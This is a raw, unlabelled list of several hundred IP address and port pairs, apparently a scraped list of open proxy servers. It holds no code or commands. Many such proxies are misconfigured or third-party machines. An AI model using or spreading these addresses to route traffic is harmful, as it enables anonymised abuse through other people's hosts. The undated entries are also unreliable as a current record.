186.95.80.222:9064 186.95.83.155:9064 186.95.97.145:9064 187.115.153.138:3128 187.157.45.114:8080 187.27.8.62:9064 187.28.188.197:8080 187.44.14.156:8080 187.62.213.241:8080 187.72.142.210:3128 187.73.16.114:8080 187.73.17.1:8080 187.73.240.103:3128 188.131.129.250:13076 188.131.135.150:13076 188.131.141.49:13076 188.131.200.101:13076 188.138.247.175:8080 188.252.7.83:8080 189.113.64.126:8080 189.123.98.49:9064 189.17.66.162:8080 189.47.216.134:3128 189.48.102.123:9064 189.55.25.156:9064 189.58.105.83:3128 189.59.9.218:8080 189.85.18.13:8080 190.120.248.237:9064 190.121.148.199:8080 190.121.158.114:8080 190.124.155.198:9064 190.128.170.18:8080 190.140.172.193:3128 190.142.114.11:9064 190.142.173.7:9064 190.142.247.169:9064 190.142.5.42:9064 190.147.68.63:9064 190.153.100.150:8080 190.153.38.152:8080 190.153.99.227:8080 190.183.67.153:9064 190.198.10.35:8080 190.198.102.154:9064 190.198.102.168:9064 190.198.103.110:8080 190.198.103.207:9064 190.198.116.36:8080 190.198.117.250:9064 190.198.118.129:9064 190.198.118.61:9064 190.198.121.66:8080 190.198.122.200:9064 190.198.127.14:8080 190.198.145.148:8080 190.198.147.108:8080 190.198.148.166:9064 190.198.151.11:9064 190.198.151.184:9064 190.198.152.147:9064 190.198.152.180:8080 190.198.154.34:8080 190.198.154.43:9064 190.198.156.130:8080 190.198.156.77:9064 190.198.158.129:9064 190.198.159.116:9064 190.198.159.211:8080 190.198.168.119:9064 190.198.177.241:8080 190.198.178.107:9064 190.198.180.71:8080 190.198.181.77:9064 190.198.182.199:8080 190.198.183.120:8080 190.198.183.17:9064 190.198.185.11:9064 190.198.187.131:9064 190.198.191.128:8080 190.198.22.83:8080 190.198.229.34:9064 190.198.237.167:9064 190.198.239.239:8080 190.198.24.169:8080 190.198.249.39:8080 190.198.27.65:9064 190.198.28.228:9064 190.198.33.194:8080 190.198.36.21:9064 190.198.47.142:8080 190.198.65.62:9064 190.198.7.25:9064 190.198.80.142:8080 190.198.86.241:8080 190.198.91.225:9064 190.199.137.101:8080 190.199.144.212:9064 190.199.167.187:9064 190.199.197.146:8080 190.199.200.1:8080 190.199.201.62:8080 190.199.206.241:9064 190.199.210.135:9064 190.199.223.36:9064 190.199.231.177:8080 190.199.241.156:9064 190.199.241.233:9064 190.199.244.190:8080 190.199.250.199:9064 190.199.35.65:9064 190.199.35.99:9064 190.199.41.173:8080 190.199.61.209:9064 190.199.61.26:8080 190.199.61.65:8080 190.199.90.204:9064 190.199.91.127:8080 190.200.0.71:8080 190.200.147.29:9064 190.200.149.231:8080 190.200.155.91:8080 190.200.176.180:9064 190.200.182.22:9064 190.200.189.228:8080 190.200.19.47:8080 190.200.190.178:8080 190.200.2.183:8080 190.200.224.84:9064 190.200.225.15:8080 190.200.225.150:9064 190.200.23.166:9064 190.200.236.159:8080 190.200.237.71:8080 190.200.237.97:9064 190.200.239.117:8080 190.200.242.76:9064 190.200.246.105:8080 190.200.248.179:9064 190.200.248.81:8080 190.200.252.221:8080 190.200.255.239:8080 190.200.38.134:8080 190.200.4.81:9064 190.200.55.118:9064 190.200.58.75:9064 190.200.6.242:8080 190.200.62.182:9064 190.201.0.136:8080 190.201.107.233:9064 190.201.108.244:9064 190.201.109.196:9064 190.201.111.114:8080 190.201.115.142:8080 190.201.120.248:9064 190.201.121.222:9064 190.201.126.238:8080 190.201.142.182:8080 190.201.143.103:8080 190.201.164.81:9064 190.201.166.247:8080 190.201.170.26:8080 190.201.172.241:9064 190.201.172.254:8080 190.201.174.191:8080 190.201.187.235:8080 190.201.198.175:9064 190.201.199.11:8080 190.201.202.74:9064 190.201.219.202:8080 190.201.237.17:9064 190.201.27.2:8080 190.201.35.96:9064 190.201.5.45:9064 190.201.56.38:9064 190.202.195.46:8080 190.202.198.17:8080 190.202.216.231:9064 190.202.221.246:8080 190.202.248.152:8080 190.202.249.56:8080 190.202.253.173:8080 190.203.0.152:9064 190.203.106.179:8080 190.203.130.76:9064 190.203.131.202:9064 190.203.134.130:9064 190.203.14.177:8080 190.203.142.182:8080 190.203.142.86:8080 190.203.164.177:8080 190.203.169.181:8080 190.203.173.212:8080 190.203.19.182:8080 190.203.195.114:8080 190.203.195.247:9064 190.203.195.50:9064 190.203.198.180:9064 190.203.211.143:9064 190.203.211.5:8080 190.203.23.44:8080 190.203.238.8:8080 190.203.40.137:8080 190.203.49.119:9064 190.203.50.172:8080 190.203.67.35:9064 190.203.76.186:8080 190.203.77.38:8080 190.203.78.207:8080 190.203.8.212:9064 190.203.82.22:8080 190.203.86.146:8080 190.203.9.30:8080 190.204.1.16:8080 190.204.10.248:9064 190.204.10.9:9064 190.204.100.30:8080 190.204.104.9:9064 190.204.106.153:8080 190.204.108.189:8080 190.204.111.139:8080 190.204.114.250:8080 190.204.115.71:8080 190.204.130.118:9064 190.204.132.142:9064 190.204.141.28:9064 190.204.143.156:9064 190.204.150.137:9064 190.204.16.141:9064 190.204.168.149:9064 190.204.172.219:8080 190.204.173.59:9064 190.204.18.197:8080 190.204.195.154:8080 190.204.239.66:8080 190.204.252.38:8080 190.204.4.103:9064 190.204.4.52:8080 190.204.41.156:9064 190.204.48.167:9064 190.204.50.113:9064 190.204.52.1:8080 190.204.53.234:8080 190.204.56.59:9064 190.204.67.20:9064 190.204.67.86:9064 190.204.7.163:9064 190.204.81.207:8080 190.204.84.18:8080 190.204.85.5:8080 190.204.86.17:8080 190.204.91.151:9064 190.204.97.135:8080 190.204.98.185:8080 190.205.112.13:9064 190.205.116.179:9064 190.205.120.5:8080 190.205.128.174:8080 190.205.146.180:8080 190.205.151.100:8080 190.205.151.110:8080 190.205.158.75:8080 190.205.158.98:9064 190.205.192.90:8080 190.205.194.167:8080 190.205.198.52:8080 190.205.199.183:9064 190.205.20.234:9064 190.205.208.203:8080 190.205.21.104:8080 190.205.210.198:9064 190.205.210.248:9064 190.205.213.44:8080 190.205.216.215:8080 190.205.217.173:8080 190.205.22.199:8080 190.205.226.147:8080 190.205.231.224:9064 190.205.255.65:8080 190.205.28.119:8080 190.205.29.68:8080 190.206.10.145:9064 190.206.10.201:9064 190.206.100.208:9064 190.206.116.112:8080 190.206.116.39:9064 190.206.117.198:9064 190.206.117.96:8080 190.206.124.122:8080 190.206.134.125:8080 190.206.140.7:8080 190.206.141.150:8080 190.206.143.104:9064 190.206.143.150:8080 190.206.154.138:9064 190.206.156.140:9064 190.206.158.58:8080 190.206.177.143:9064 190.206.204.30:9064 190.206.210.119:9064 190.206.210.153:8080 190.206.210.245:9064 190.206.210.60:8080 190.206.211.227:8080 190.206.211.239:9064 190.206.211.43:9064 190.206.213.71:9064 190.206.221.197:9064 190.206.226.38:8080 190.206.3.250:9064 190.206.33.234:9064 190.206.35.69:8080 190.206.54.11:9064 190.206.58.180:9064 190.206.64.109:9064 190.206.87.59:8080 190.206.88.235:9064 190.206.91.76:9064 190.206.93.53:8080 190.207.1.250:9064 190.207.102.51:9064 190.207.104.137:9064 190.207.110.84:8080 190.207.122.40:8080 190.207.127.25:9064 190.207.138.23:9064 190.207.140.171:8080 190.207.154.111:8080 190.207.159.150:8080 190.207.159.183:8080 190.207.160.159:9064 190.207.162.153:9064 190.207.163.88:8080 190.207.163.95:8080 190.207.175.116:8080 190.207.182.172:8080 190.207.183.241:8080 190.207.185.170:8080 190.207.185.180:9064 190.207.191.213:8080 190.207.195.247:9064 190.207.201.142:9064 190.207.201.167:9064 190.207.201.78:8080 190.207.203.98:8080 190.207.205.146:8080 190.207.219.160:9064 190.207.223.8:9064 190.207.224.247:9064 190.207.225.60:8080 190.207.225.97:8080 190.207.228.112:8080 190.207.228.179:8080 190.207.228.3:9064 190.207.229.147:9064 190.207.251.253:8080 190.207.3.51:9064 190.207.3.88:9064 190.207.5.232:9064 190.207.67.236:9064 190.207.7.220:9064 190.207.7.251:9064 190.207.74.127:9064 190.207.85.47:8080 190.209.69.190:9064 190.217.164.197:9064 190.221.29.214:8080 190.228.33.114:8080 190.36.107.226:9064 190.36.113.17:9064 190.36.141.28:8080 190.36.143.231:8080 190.36.179.31:9064 190.36.21.37:8080 190.36.211.224:8080 190.36.218.233:9064 190.36.22.105:9064 190.36.220.65:9064 190.36.235.251:9064 190.36.238.254:9064 190.36.27.222:9064 190.36.31.104:9064 190.36.80.54:9064 190.36.81.12:9064 190.36.81.42:9064 190.37.125.109:9064 190.37.166.20:8080 190.37.174.156:9064 190.37.38.64:9064 190.37.41.88:9064 190.37.43.79:8080 190.37.65.16:9064 190.37.72.4:9064 190.37.75.211:9064 190.37.90.239:8080 190.38.0.219:9064 190.38.112.96:9064 190.38.118.248:9064 190.38.154.160:9064 190.38.160.87:8080 190.38.166.178:8080 190.38.166.34:8080 190.38.176.97:8080 190.38.178.91:9064 190.38.189.61:8080 190.38.21.244:9064 190.38.25.185:9064 190.38.35.100:9064 190.38.49.164:9064 190.38.50.78:9064 190.38.51.127:9064 190.38.64.191:9064 190.38.65.220:8080 190.38.80.37:9064 190.38.85.167:8080 190.38.95.253:9064 190.39.100.107:9064 190.39.106.190:9064 190.39.109.229:9064 190.39.118.33:9064 190.39.126.75:9064 190.39.140.223:8080 190.39.141.202:9064 190.39.143.223:8080 190.39.146.156:8080 190.39.146.81:8080 190.39.242.188:9064 190.39.243.167:9064 190.39.243.214:9064 190.39.245.28:9064 190.39.249.171:9064 190.39.42.18:9064 190.39.42.50:9064 190.39.75.142:9064 190.39.80.85:9064 190.39.81.54:9064 190.39.82.246:9064 190.39.84.224:9064 190.40.123.35:8080 190.7.129.204:3128 190.72.101.125:9064 190.72.11.203:9064 190.72.134.57:8080 190.72.137.188:9064 190.72.159.60:9064 190.72.176.31:8080 190.72.224.205:9064 190.72.241.227:9064 190.72.31.73:9064 190.72.31.92:9064 190.73.104.232:8080 190.73.109.6:9064 190.73.111.71:8080 190.73.124.34:8080 190.73.128.73:8080 190.73.131.80:9064 190.73.131.91:9064 190.73.134.113:9064 190.73.136.89:8080 190.73.138.249:9064 190.73.152.131:8080 190.73.155.179:9064 190.73.155.67:9064 190.73.171.197:8080 190.73.172.132:8080 190.73.194.198:8080 190.73.201.68:9064 190.73.226.84:9064 190.73.234.98:9064 190.73.252.120:8080 190.73.33.246:9064 190.73.34.187:8080 190.73.37.50:8080 190.73.42.217:8080 190.73.46.226:9064 190.73.64.94:8080 190.73.79.174:8080 190.73.8.132:9064 190.74.127.103:8080 190.74.168.149:8080 190.74.184.136:9064 190.74.188.75:9064 190.74.191.69:8080 190.74.202.207:9064 190.74.210.215:9064 190.74.57.215:9064 190.74.85.221:9064 190.75.131.113:9064 190.75.194.53:8080 190.75.50.30:8080 190.75.63.121:9064 190.75.67.191:9064 190.75.96.113:9064 190.77.116.225:9064 190.77.15.108:8080 190.77.170.249:8080 190.77.185.158:9064 190.77.191.13:9064 190.77.201.73:9064 190.77.204.21:8080 190.77.211.25:9064 190.77.215.19:9064 190.77.215.7:9064 190.77.219.23:8080 190.77.242.82:9064 190.77.243.170:8080 190.77.36.238:8080 190.77.47.238:9064 190.77.91.125:9064 190.77.91.55:9064 190.78.108.101:8080 190.78.125.189:9064 190.78.136.150:8080 190.78.149.225:9064 190.78.158.185:9064 190.78.168.187:9064 190.78.170.45:9064 190.78.179.233:9064 190.78.180.208:8080 190.78.180.50:9064 190.78.183.186:9064 190.78.21.161:9064 190.78.23.59:9064 190.78.28.65:8080 190.78.28.75:9064 190.78.31.194:8080 190.78.44.220:8080 190.78.54.242:8080 190.78.80.8:9064 190.78.87.48:9064 190.78.88.134:9064 190.78.94.10:9064 190.79.129.53:9064 190.79.34.206:8080 190.79.38.154:9064 190.79.41.240:9064 190.79.43.24:9064 190.79.45.164:9064 190.79.48.177:9064 190.79.49.220:9064 190.79.49.34:9064 190.79.93.204:8080 190.85.37.90:3128 190.94.253.68:9064 191.103.46.97:9064 192.241.189.103:3128 192.241.189.130:8080 192.3.104.245:80 192.99.140.228:7808 192.99.140.228:8089 192.99.168.198:8080 193.107.4.105:6666 193.107.4.125:6666 193.107.4.177:6666 193.150.13.87:3128 194.210.156.150:9064 194.210.179.66:9064 194.84.157.1:8080 195.114.125.81:8080 195.151.218.237:8080 195.154.233.59:3128 195.175.201.170:8080 195.46.164.155:3128 196.28.251.222:3128 196.45.51.27:8080 197.231.248.91:80 197.253.1.3:8080 198.2.253.9:3128 198.50.149.189:8888 198.81.200.145:80 199.200.120.140:7808 199.200.120.140:8089 2.135.237.210:9090 2.135.237.228:9090 200.109.196.126:8080 200.109.223.100:8080 200.109.35.220:9064 200.109.42.225:9064 200.122.103.84:9064 200.123.162.45:8080 200.16.117.62:80 200.174.182.105:8080 200.183.192.243:8088 200.195.171.226:3128 200.29.67.29:80 200.42.89.242:8080 200.69.141.18:8080 200.8.149.115:9064 200.8.149.5:9064 200.8.251.194:9064 200.82.192.251:8080 200.82.203.52:9064 200.82.217.69:9064 200.84.148.151:9064 200.84.151.160:9064 200.84.227.128:9064 200.84.234.178:8080 200.84.34.177:9064 200.84.45.170:8080 200.84.46.231:8080 200.84.99.3:9064 200.90.65.106:9064 200.90.67.235:9064 200.90.69.205:9064 200.93.107.192:9064 200.93.17.43:9064 200.93.67.6:8080 200.93.70.15:9064 200.93.87.25:8080 200.93.89.132:9064 200.93.94.91:8080 200.99.150.72:8080 201.13.87.37:9064 201.208.109.151:9064 201.208.111.205:8080 201.208.132.234:9064 201.208.133.29:9064 201.208.164.59:8080 201.208.167.79:8080 201.208.234.159:9064 201.208.5.73:9064 201.209.13.245:8080 201.209.202.95:9064 201.209.220.92:9064 201.209.226.37:9064 201.209.228.71:9064 201.209.23.231:8080 201.209.233.115:8080 201.209.234.30:9064 201.209.36.51:9064 201.209.37.124:8080 201.209.44.82:9064 201.209.5.138:9064 201.209.63.95:9064 201.209.79.145:9064 201.209.81.62:8080 201.210.127.89:9064 201.210.248.68:9064 201.210.255.140:9064 201.210.71.68:9064 201.210.98.194:9064 201.211.103.199:8080 201.211.136.148:8080 201.211.136.75:9064 201.211.143.98:8080 201.211.204.59:8080 201.211.224.66:9064 201.211.227.227:9064 201.212.23.137:9064 201.221.132.22:8080 201.221.132.69:3128 201.242.139.183:8080 201.242.155.54:8080 201.242.232.175:8080 201.242.27.37:9064 201.242.39.120:9064 201.242.42.111:9064 201.242.54.89:8080 201.243.102.246:8080 201.243.106.10:8080 201.243.108.244:8080 201.243.132.253:8080 201.243.144.174:9064 201.243.145.237:8080 201.243.150.230:9064 201.243.155.40:9064 201.243.162.106:9064 201.243.175.131:8080 201.243.176.128:8080 201.243.176.168:9064 201.243.180.234:8080 201.243.186.199:8080 201.243.189.154:8080 201.243.202.44:9064 201.243.203.111:8080 201.248.10.77:9064 201.248.115.161:8080 201.248.22.78:8080 201.248.235.242:9064 201.248.96.97:9064 201.248.99.165:9064 201.251.156.17:8080 201.30.215.194:3128 201.43.162.91:9064 201.62.93.87:3128 201.65.79.114:3128 201.86.94.166:8080 202.101.96.154:8888 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.153.231.147:8080 202.166.195.113:8080 202.169.53.14:8010 202.171.253.74:82 202.171.253.74:83 202.171.253.74:84 202.171.253.84:86 202.53.254.99:8080 202.53.82.134:8080 202.56.231.117:8080 202.70.2.107:8088 202.75.18.34:8080 202.79.59.110:8080 202.86.216.23:80 203.192.12.148:80 203.192.217.187:9064 203.195.254.184:8888 203.201.170.146:31281 203.202.250.98:3128 203.68.25.62:9064 203.77.246.98:8080 203.90.236.152:3128 203.91.119.42:8080 203.91.121.74:3128 205.129.191.112:80 206.174.165.161:3128 207.108.136.68:443 208.109.119.221:80 208.123.212.170:80 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.101.131.231:8080 210.101.131.231:8081 210.13.105.23:8080 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:88 210.65.10.76:3128 211.138.121.36:87 211.138.121.38:80 211.138.121.38:81 211.139.45.253:8123 211.141.128.81:8118 211.144.81.66:18000 211.144.81.69:18000 211.162.0.170:80 212.112.107.254:3128 212.126.99.122:8080 212.200.131.83:80 212.200.131.83:8080 212.224.114.98:3128 212.25.61.158:8080 212.4.137.55:8080 212.91.10.142:8080 213.42.0.190:80 213.92.197.70:80 216.162.24.217:8080 216.218.216.201:7808 216.218.216.201:8089 216.230.144.141:80 217.117.6.21:80 217.168.89.136:80 217.169.215.175:6666 217.172.179.88:13910 217.199.160.78:80 217.21.146.130:8080 218.104.239.12:8118 218.107.217.82:80 218.107.217.82:82 218.108.168.70:80 218.108.168.70:82 218.164.36.61:9064 218.166.33.21:9064 218.201.21.142:80 218.201.42.35:80 218.201.74.121:8123 218.203.13.170:80 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.204.120.37:8123 218.206.188.247:8123 218.206.83.89:80 218.207.13.134:8123 218.207.16.71:8123 218.207.17.132:8123 218.207.172.236:80 218.207.208.55:8080 218.207.27.19:8123 218.207.27.198:8123 218.207.27.57:8123 218.207.50.117:8123 218.207.50.122:8123 218.207.50.178:8123 218.207.51.109:8123 218.207.51.218:8123 218.207.54.19:8123 218.240.156.82:80 218.28.96.39:3128 218.59.144.120:80 218.59.144.120:81 218.59.144.95:80 218.59.144.95:81 218.65.132.38:80 218.65.132.38:8081 218.7.132.1:8080 218.71.87.209:3128 218.80.232.38:8080 218.90.174.167:3128 219.239.236.49:8888 219.64.181.118:9064 219.85.111.7:9064 219.85.135.52:8088 219.85.166.39:8088 219.85.181.88:9064 219.85.207.206:8088 219.85.246.236:8088 219.90.107.242:9064 219.90.96.206:9064 219.91.239.176:9064 220.129.162.79:9064 220.129.173.157:9064 220.129.242.224:9064 220.129.71.238:9064 220.130.180.53:8080 220.136.157.129:9064 220.136.158.18:8088 220.136.238.152:9064 220.136.29.13:9064 220.136.84.185:9064 220.137.176.23:9064 220.137.243.185:9064 220.141.89.239:9064 220.142.6.120:9064 220.143.11.82:8088 220.143.174.163:9064 220.167.104.175:80 220.231.32.195:3128 221.0.182.5:808 221.10.102.199:81 221.10.102.199:82 221.10.102.199:83 221.130.178.78:8585 221.169.204.3:9064 221.176.14.72:80 221.178.117.210:8123 221.178.118.29:8123 221.178.119.61:8123 221.178.21.240:8123 221.178.22.130:8123 221.178.23.71:8123 221.178.24.214:8123 221.178.25.115:8123 221.178.28.151:8123 221.178.28.200:8123 221.178.28.21:8123 221.178.28.245:8123 221.178.29.13:8123 221.178.31.123:8123 221.178.31.190:8123 221.178.31.50:8123 221.178.32.58:8123 221.178.45.95:8123 221.178.53.114:8123 221.178.53.47:8123 221.178.54.128:8123 221.178.54.137:8123 221.178.54.94:8123 221.178.55.128:8123 221.178.55.165:8123 221.178.55.202:8123 221.178.55.221:8123 221.178.66.219:8123 221.178.75.205:8123 221.178.76.14:8123 221.178.76.158:8123 221.178.77.188:8123 221.178.77.215:8123 221.178.78.168:8123 221.178.79.86:8123 221.178.81.103:8123 221.178.86.3:8123 221.178.87.237:8123 221.178.96.203:8123 221.178.97.122:8123 221.178.97.157:8123 221.178.97.2:8123 221.178.97.251:8123 221.178.98.73:8123 221.178.98.98:8123 221.182.73.213:8123 221.182.75.84:8123 221.183.16.219:80 221.214.221.148:3128 221.5.69.51:80 221.5.69.52:8085 221.7.112.108:80 222.127.242.35:8080 222.128.171.142:4000 222.160.250.237:8585 222.217.221.239:8888 222.217.221.240:8888 222.218.157.233:9999 222.246.232.55:8101 222.29.86.69:3128 222.34.136.60:80 222.45.196.19:8118 222.59.244.14:8118 222.85.1.123:8118 222.85.103.3:81 222.88.236.236:843 222.89.248.101:9999 223.252.33.201:16158 223.252.33.201:16515 223.252.33.201:17130 223.252.33.201:19305 223.252.33.201:24809 223.30.231.94:8080 223.64.142.24:8123 223.64.181.153:8123 223.64.182.52:8123 223.64.19.36:8123 223.64.223.123:8123 223.64.35.119:8123 223.64.38.246:8123 223.64.38.88:8123 223.66.167.134:8123 223.66.183.198:8123 223.66.75.135:8123 223.66.80.251:8123 223.67.159.209:8123 223.67.163.215:8123 223.67.165.120:8123 223.67.165.67:8123 223.67.210.200:8123 223.67.217.52:8123 223.67.217.63:8123 223.67.218.99:8123 223.67.235.39:8123 223.68.14.92:8123 223.68.15.128:8123 223.68.59.101:8123 223.68.6.10:8000 223.82.10.46:8123 223.82.12.106:8123 223.82.12.154:8123 223.82.173.96:8123 223.82.175.116:8123 223.82.204.126:8123 223.82.206.32:8123 223.82.207.247:8123 223.82.216.188:8123 223.82.216.193:8123 223.82.216.218:8123 223.82.217.193:8123 223.82.217.25:8123 223.82.230.26:8123 223.82.232.20:8123 223.82.237.142:8123 223.82.27.149:8123 223.82.36.148:8123 223.82.37.219:8123 223.82.38.126:8123 223.82.42.166:8123 223.82.43.137:8123 223.82.43.143:8123 223.82.44.140:8123 223.82.44.55:8123 223.82.46.117:8123 223.82.46.126:8123 223.82.67.101:8123 223.82.68.154:8123 223.82.68.203:8123 223.82.69.234:8123 223.82.72.110:8123 223.82.79.109:8123 223.82.82.155:8123 223.82.83.16:8123 223.82.87.198:8123 223.82.93.4:8123 223.82.93.56:8123 223.82.95.164:8123 223.83.139.103:8123 223.83.140.182:8123 223.83.141.112:8123 223.83.18.53:8123 223.83.185.216:8123 223.83.186.250:8123 223.83.191.61:8123 223.83.191.96:8123 223.83.197.137:8123 223.83.208.75:8123 223.83.209.48:8123 223.83.212.58:8123 223.83.214.141:8123 223.83.218.181:8123 223.83.221.200:8123 223.83.222.159:8123 223.83.223.165:8123 223.83.227.29:8123 223.83.229.225:8123 223.83.24.229:8123 223.83.26.95:8123 223.83.35.108:8123 223.83.35.5:8123 223.83.37.144:8123 223.83.37.241:8123 223.83.56.188:8123 223.83.56.249:8123 223.83.57.153:8123 223.83.57.197:8123 223.83.58.144:8123 223.83.59.226:8123 223.83.59.49:8123 223.83.62.157:8123 223.83.62.91:8123 223.83.74.85:8123 223.83.77.84:8123 223.83.83.132:8123 223.83.84.208:8123 223.83.84.82:8123 223.84.101.88:8123 223.84.116.215:8123 223.84.12.126:8123 223.84.13.3:8123 223.84.130.147:8123 223.84.130.17:8123 223.84.130.4:8123 223.84.132.119:8123 223.84.134.246:8123 223.84.134.250:8123 223.84.137.157:8123 223.84.139.151:8123 223.84.144.199:8123 223.84.151.142:8123 223.84.155.155:8123 223.84.16.192:8123 223.84.164.25:8123 223.84.166.187:8123 223.84.168.178:8123 223.84.169.224:8123 223.84.169.67:8123 223.84.184.123:8123 223.84.187.127:8123 223.84.192.161:8123 223.84.195.138:8123 223.84.196.129:8123 223.84.197.251:8123 223.84.199.160:8123 223.84.203.6:8123 223.84.207.165:8123 223.84.207.171:8123 223.84.207.245:8123 223.84.208.107:8123 223.84.209.201:8123 223.84.219.54:8123 223.84.232.138:8123 223.84.233.116:8123 223.84.233.180:8123 223.84.233.33:8123 223.84.235.188:8123 223.84.236.140:8123 223.84.236.199:8123 223.84.248.138:8123 223.84.26.137:8123 223.84.26.97:8123 223.84.28.225:8123 223.84.32.27:8123 223.84.37.189:8123 223.84.4.127:8123 223.84.4.44:8123 223.84.5.96:8123 223.84.6.20:8123 223.84.7.235:8123 223.84.98.109:8123 223.85.100.233:8123 223.85.106.241:8123 223.85.110.24:8123 223.85.110.247:8123 223.85.16.181:8123 223.85.17.103:8123 223.85.18.140:8123 223.85.18.226:8123 223.85.18.242:8123 223.85.19.123:8123 223.85.19.169:8123 223.85.19.237:8123 223.85.20.150:8123 223.85.20.60:8123 223.85.21.121:8123 223.85.21.98:8123 223.85.22.7:8123 223.85.23.162:8123 223.85.23.245:8123 223.85.23.63:8123 223.85.26.147:8123 223.85.60.62:8123 223.85.62.130:8123 223.85.80.6:8123 223.85.81.157:8123 223.85.81.201:8123 223.85.81.88:8123 223.85.83.112:8123 223.85.83.233:8123 223.85.93.83:8123 223.85.96.58:8123 223.85.97.15:8123 223.85.99.183:8123 223.85.99.76:8123 223.86.100.122:8123 223.86.100.239:8123 223.86.101.151:8123 223.86.101.168:8123 223.86.102.210:8123 223.86.102.252:8123 223.86.102.94:8123 223.86.11.57:8123 223.86.112.253:8123 223.86.113.222:8123 223.86.115.19:8123 223.86.116.135:8123 223.86.116.168:8123 223.86.116.31:8123 223.86.116.40:8123 223.86.117.212:8123 223.86.117.233:8123 223.86.117.246:8123 223.86.120.14:8123 223.86.127.146:8123 223.86.127.54:8123 223.86.130.161:8123 223.86.131.144:8123 223.86.132.189:8123 223.86.132.98:8123 223.86.134.146:8123 223.86.14.134:8123 223.86.14.165:8123 223.86.14.210:8123 223.86.14.78:8123 223.86.171.100:8123 223.86.171.244:8123 223.86.200.49:8123 223.86.203.102:8123 223.86.208.182:8123 223.86.209.13:8123 223.86.209.141:8123 223.86.211.234:8123 223.86.212.120:8123 223.86.213.115:8123 223.86.213.164:8123 223.86.213.196:8123 223.86.213.241:8123 223.86.213.72:8123 223.86.213.96:8123 223.86.216.22:8123 223.86.217.168:8123 223.86.218.4:8123 223.86.220.112:8123 223.86.220.177:8123 223.86.220.55:8123 223.86.221.54:8123 223.86.223.177:8123 223.86.223.254:8123 223.86.223.94:8123 223.86.3.82:8123 223.86.35.212:8123 223.86.4.124:8123 223.86.4.75:8123 223.86.5.166:8123 223.86.6.160:8123 223.86.6.188:8123 223.86.6.252:8123 223.86.65.143:8123 223.86.68.23:8123 223.86.68.38:8123 223.86.7.171:8123 223.86.7.231:8123 223.86.7.6:8123 223.86.75.113:8123 223.86.76.12:8123 223.86.76.121:8123 223.86.76.28:8123 223.86.8.215:8123 223.86.97.101:8123 223.86.99.213:8123 223.86.99.52:8123 223.87.159.75:8123 223.87.184.195:8123 223.87.185.213:8123 223.87.186.83:8123 223.87.4.20:3128 223.99.189.102:8090 23.99.192.109:3128 27.105.143.30:8088 27.105.16.69:9064 27.105.40.3:9064 27.106.42.231:9064 27.131.173.2:8080 27.131.47.131:8080 27.147.1.62:9064 27.147.170.248:9064 27.159.250.51:8118 27.2.132.62:9064 27.3.207.169:9064 27.3.23.15:9064 27.4.197.160:9064 27.49.68.102:9064 27.5.50.31:9064 27.51.133.72:9064 27.51.2.109:9064 27.6.8.140:9064 31.131.67.76:8080 31.15.48.12:80 31.220.42.77:8080 36.224.17.150:9064 36.224.214.91:9064 36.225.36.44:9064 36.225.88.73:9064 36.227.234.92:9064 36.229.4.29:9064 36.230.52.19:9064 36.230.53.197:8088 36.230.82.233:9064 36.231.127.164:8088 36.232.170.88:9064 36.232.42.12:9064 36.232.67.226:9064 36.232.95.237:9064 36.233.161.37:9064 36.233.36.47:9064 36.234.179.202:9064 36.234.32.34:9064 36.234.34.93:9064 36.237.57.57:9064 36.239.124.234:9064 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.44.120.115:8080 36.72.167.179:8080 36.74.72.205:3128 36.77.127.16:8080 36.80.167.119:9064 36.80.34.206:8080 36.81.3.5:515 36.84.142.63:9064 36.85.218.199:8080 36.88.169.184:9064 37.16.71.41:8080 37.187.112.134:3128 37.187.237.120:80 37.232.234.212:9064 37.239.46.26:80 37.239.46.50:80 37.49.137.243:3128 37.49.137.243:80 39.189.66.74:8123 39.65.225.89:8585 39.67.154.117:8585 41.188.49.159:8080 41.188.49.163:3128 41.188.49.164:3128 41.203.89.131:8080 41.222.196.52:8080 41.222.44.42:8080 41.223.119.156:3128 41.75.201.146:8080 41.78.208.93:8080 41.86.25.158:8080 46.119.222.118:3128 46.39.192.53:8080 46.40.37.161:80 46.40.38.110:8080 49.204.149.60:9064 49.204.184.132:9064 49.204.4.223:9064 49.204.49.46:9064 49.205.197.223:9064 49.205.26.143:9064 49.205.43.15:9064 49.206.171.156:9064 49.206.43.207:9064 49.207.108.80:9064 49.207.113.190:9064 49.207.126.213:9064 49.75.238.14:8123 5.102.170.20:3128 5.135.146.173:80 5.149.101.137:80 5.56.12.1:8080 5.56.61.185:19350 5.56.61.186:19350 54.148.68.88:3128 54.188.223.55:60884 54.244.254.219:3128 54.64.164.168:3128 54.77.29.185:3128 54.92.26.86:3128 58.115.107.63:9064 58.214.5.229:80 58.215.185.46:82 58.251.131.251:8888 58.251.78.71:8088 58.252.167.103:80 58.252.69.194:8888 58.253.238.242:80 58.67.159.50:80 59.115.137.231:8088 59.115.140.216:9064 59.115.145.50:9064 59.115.190.59:9064 59.115.237.190:9064 59.115.240.84:8088 59.120.220.130:9064 59.124.220.92:80 59.124.220.93:80 59.149.1.82:80 59.173.130.20:3128 59.41.47.148:18764 59.44.152.110:9999 59.46.72.245:8080 59.50.34.243:80 59.95.228.79:9064 60.194.100.51:80 60.195.3.180:8118 60.198.17.110:9064 60.206.246.66:8118 60.213.189.170:3988 60.214.219.28:8585 60.216.217.207:8585 60.25.36.63:18186 61.149.95.8:8888 61.154.2.156:8118 61.156.3.166:80 61.156.35.2:3128 61.157.126.37:18000 61.158.173.188:9999 61.184.192.42:80 61.223.185.223:9064 61.224.158.114:9064 61.224.201.11:9064 61.227.216.92:9064 61.227.54.167:9064 61.227.77.128:9064 61.227.79.216:9064 61.228.179.199:9064 61.228.61.88:9064 61.230.27.230:9064 61.231.194.225:9064 61.231.48.39:9064 61.232.6.164:8081 61.51.238.135:808 61.53.143.179:80 61.54.221.201:3128 61.62.205.246:8088 61.62.206.28:8088 61.62.5.46:8088 61.64.179.158:9064 61.7.191.89:9064 61.8.70.114:8080 62.103.107.9:80 62.75.229.121:3128 62.82.23.1:8080 64.156.195.147:3128 64.156.195.150:3128 64.31.22.131:7808 64.31.22.131:8089 64.31.22.143:7808 64.31.22.143:8089 65.49.14.147:3080 65.49.14.147:3128 66.135.33.230:3128 66.162.208.10:3128 